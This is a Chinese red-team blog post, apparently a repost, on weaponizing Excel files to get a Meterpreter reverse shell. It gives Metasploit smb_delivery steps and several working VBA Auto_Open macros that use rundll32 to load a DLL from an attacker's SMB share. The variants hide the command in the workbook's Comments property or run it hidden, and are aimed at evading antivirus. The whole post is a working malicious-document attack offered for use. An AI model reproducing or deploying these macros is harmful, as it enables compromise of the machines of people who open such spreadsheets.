红队技巧 | 武器化Excel

  • A+
所属分类:安全文章

0x01 前言

通过Excel文件运行命令行以生成Meterpreter反向shell的不同方法,尝试使用这种方式来尝试Bypass_AV

0x02 SMB_Deliver Exploit

Metasploit SMB传递模块通过SMB服务器提供.dll有效负载,并执行生成的有效负载的命令。

Msfconsole:

use exploit/windows/smb/smb_delivery

红队技巧 | 武器化Excel执行exploit会自动设置meterpreter_reverse_tcp有效负载,以便在受害机器上打开Meterpreter反向 shell

红队技巧 | 武器化Excel我在我们的测试环境执行命令

rundll32.exe \192.168.190.128321.dll,0

红队技巧 | 武器化Excel
#爬坑: 在Win10上需要SMB2或更高版本的错误
http://www.ghost580.com/win10/2018-11-10/26476.html

红队技巧 | 武器化Excel反向shell成功执行

0x03 Excel 武器化

VBS 宏脚本

红队技巧 | 武器化ExcelCode:

Sub Auto_Open()
Call Shell("cmd.exe /c rundll32.exe \192.168.190.128321.dll,0", )
End Sub

发现简单的宏文件是无法绕过AV

在备注插入命令宏执行

红队技巧 | 武器化Excel在备注下插入命令行,宏文件代码Code:

Sub Auto_Open()
Dim prop As DocumentProperty
    For Each prop In ActiveWorkbook.BuiltinDocumentProperties
        If prop.Name = "Comments" Then
            Shell prop.Value
        End If
    Next
End Sub
红队技巧 | 武器化Excel
红队技巧 | 武器化Excel
自定义公式执行

为了运行命令行,我创建了一个适合我们的自定义公式

红队技巧 | 武器化Excel
自定义按钮内的 VBS 宏脚本

我在自定义按钮中插入了 VBS 宏脚本红队技巧 | 武器化ExcelCode:

Sub Auto_Open()
Call Shell("rundll32.exe \192.168.190.128321.dll,0", vbHide)
End Sub

红队技巧 | 武器化Excel保存为.xls文件然后打开发现可以反向Shell

红队技巧 | 武器化Excel
红队技巧 | 武器化Excel

0x04 结尾

单纯记录一下,大佬们不喜勿喷

红队技巧 | 武器化Excel


本文始发于微信公众号(不懂安全的校长):红队技巧 | 武器化Excel

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: